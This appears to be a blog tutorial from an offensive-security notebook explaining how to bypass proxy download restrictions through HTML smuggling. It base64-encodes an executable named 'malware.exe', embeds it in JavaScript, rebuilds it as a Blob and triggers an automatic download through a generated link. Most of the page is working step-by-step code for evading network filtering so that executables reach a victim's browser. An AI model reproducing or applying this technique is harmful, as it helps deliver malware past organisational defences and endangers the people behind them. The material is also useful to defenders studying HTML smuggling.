Bypass Download Restriction with JavaScript Blob

In this blog post, we're going to bypass download restriction with JavaScript Blob.

Sometimes proxies might disallow downloading executable files. When you send a HTTP GET request to /malware.exe, the proxy catches and drops the request. Fortunately there's been a work around since HTML5.

LogoGitHub - talhak08/bypass_download_restrictionGitHub

Steps to Bypass The Restriction

  1. Convert the executable file to Base64.

  2. Copy the Base64 string and assign it to a JavaScript variable.

  3. Write a function which converts Base64 to binary.

  4. Convert the Base64 string with the function.

  5. Create a "octet/stream" type blob.

  6. Create an object URL.

  7. Create a link (a). (This step can be omitted if you already have a link tag.)

  8. Edit href and download attributes of the link.

  9. Click the link automatically.

  10. To clean up, revoke the URL you created.

What is Blob?

The Blob object represents a blob, which is a file-like object of immutable, raw data; they can be read as text or binary data, or converted into a ReadableStream so its methods can be used for processing the data.

Step #1 - Convert The Executable File

If you have access to Bash, you can use base64 command to convert an executable file to Base64 string.

base64 -w0 malware.exe

Step #2, 3, 4

window.atob => Converts ASCII to binary.

charCodeAt => Returns UTF-16 code of the giving character.

var base64toArrayBuffer = (b64) => {
            let binaryStr = window.atob(b64);
            let lenOfBinaryStr = binaryStr.length;

            let bytes = new Uint8Array(lenOfBinaryStr);
            for(let i = 0; i < lenOfBinaryStr; i++)
                bytes[i] = binaryStr.charCodeAt(i);

            return bytes;
}

var b64 = "aGVsbG8gd29ybGQK...";
var bytes = base64toArrayBuffer(b64);

Step #5 - Create a Blob

-- snippet --
var bytes = base64toArrayBuffer(b64);
var blob = new Blob([bytes], {type: "octet/stream"});

Step #6 - Create an Object URL

-- snippet --
var blob = new Blob([bytes], {type: "octet/stream"});
var fileName = 'malware.exe';
var url = window.URL.createObjectURL(blob);

Step #7, 8 - Create a Link

-- snippet --
var link = document.createElement("a");
link.href = window.URL.createObjectURL(blob);
link.download = fileName;
document.body.appendChild(link);

If you check out the DOM. You can examine the created link.

Step #9, 10

-- snippet --
var link = document.createElement("a");
link.href = window.URL.createObjectURL(blob);
link.download = fileName;
document.body.appendChild(link);

link.click()
window.URL.revokeObjectURL(url);

Links

  1. https://developer.mozilla.org/en-US/docs/Web/API/Blob

  2. https://developer.mozilla.org/en-US/docs/Web/API/ReadableStream

PreviousEmbed Shellcode into PE ResourcesNextParent Process ID Spoofing

Last updated

Was this helpful?